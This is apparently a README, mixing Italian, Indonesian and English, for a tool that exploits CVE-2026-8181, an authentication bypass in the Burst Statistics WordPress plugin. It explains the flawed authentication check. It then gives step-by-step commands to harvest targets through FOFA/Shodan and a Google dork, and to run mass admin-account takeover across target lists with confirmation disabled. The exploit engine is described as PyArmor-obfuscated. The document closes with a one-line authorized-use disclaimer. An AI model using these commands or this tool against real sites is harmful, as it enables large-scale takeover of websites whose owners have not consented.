
CVE-2026-8181 — Bypass dell'autenticazione del plugin Burst Statistics per WordPress (CVSS 9.8) fino alla compromissione dell'account amministratore. Scanner di massa con integrazione FOFA/Shodan e GUI moderna.
CVSS 9.8 (Critical) — Authentication Bypass to Admin Account Takeover
CVE-2026-8181 è una vulnerabilità di Bypass di Autenticazione nel plugin WordPress Burst Statistics versione 3.4.0 fino a 3.4.1.1. Questo plugin è utilizzato da 200.000+ siti WordPress come alternativa privacy-friendly a Google Analytics per le analisi.
Questa vulnerabilità consente a un attaccante senza autenticazione che conosce il nome utente admin di:
La funzione is_mainwp_authenticated() in class-mainwp-proxy.php sbaglia nella validazione del valore di ritorno di wp_authenticate_application_password(). Questa funzione restituisce null (non WP_Error) quando viene chiamata al di fuori del contesto REST API, e il codice controlla solo is_wp_error(). Poiché null non è un WP_Error, l'autenticazione viene considerata riuscita.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
Fai doppio clic su run.bat o esegui:
py -3.11 gui_modern.py

Vista della GUI moderna di CVE-2026-8181 con 3 schede
Nella scheda Scan: scegli la fonte del target (FOFA/Shodan da .env, file o manuale) → clicca su SCAN TARGETS. Nella scheda Exploit: inserisci il nome utente admin → clicca su EXPLOIT

Lo strumento trova target vulnerabili e pronti per l'exploit
Se l'exploit ha successo, l'attaccante ottiene accesso completo come amministratore:

Dashboard amministratore WordPress dopo un exploitation riuscito
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env.env| Flag | Descrizione |
|---|---|
-t, --target | URL del target (singolo) |
-l, --list | File contenente l'elenco dei target |
-u, --username | Nome utente admin (default: admin) |
-T, --threads | Numero di thread (default: 10) |
-o, --output | File di output dei risultati |
-v, --verbose | Output di debug |
--timeout | Timeout richiesta (secondi) |
--no-confirm | Salta conferma |
Solo per scopi educativi e penetration testing autorizzato. L'uso senza autorizzazione su sistemi che non sono di tua proprietà è illegale. Utilizza solo su siti che possiedi o per i quali hai autorizzazione scritta.